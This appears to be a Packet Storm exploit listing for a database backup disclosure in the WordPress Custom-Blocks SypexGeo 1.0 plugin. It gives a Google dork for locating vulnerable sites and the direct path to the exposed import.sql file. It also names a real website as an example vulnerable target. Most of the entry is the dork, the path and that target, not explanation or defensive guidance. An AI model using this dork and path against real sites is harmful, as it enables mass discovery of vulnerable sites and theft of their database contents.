WordPress Custom-Blocks SypexGeo 1.0 Database Disclosure

2018-12-10T00:00:00
ID PACKETSTORM:150696
Type packetstorm
Reporter KingSkrupellos
Modified 2018-12-10T00:00:00

Description

                                        
                                            `#################################################################################################  
  
# Exploit Title : WordPress Custom-Blocks SypexGeo Plugins 1.0 Database  
Backup Disclosure  
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security  
Army  
# Date : 08/12/2018  
# Vendor Homepage : wordpress.org  
# Software Download Link : N/A  
# Tested On : Windows and Linux  
# Category : WebApps  
# Version Information : 1.0  
# Exploit Risk : Medium  
# Google Dorks : inurl:''/wp-content/plugins/custom-blocks/sypexgeo/''  
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access  
Controls ]  
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]  
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]  
  
#################################################################################################  
  
# Admin Panel Login Path :  
  
/wp-login.php  
  
# Exploit :  
  
/wp-content/plugins/custom-blocks/sypexgeo/import.sql  
  
#################################################################################################  
  
# Example Vulnerable Site =>  
  
[+] repsys.ru/wp-content/plugins/custom-blocks/sypexgeo/import.sql  
  
#################################################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team  
  
#################################################################################################  
`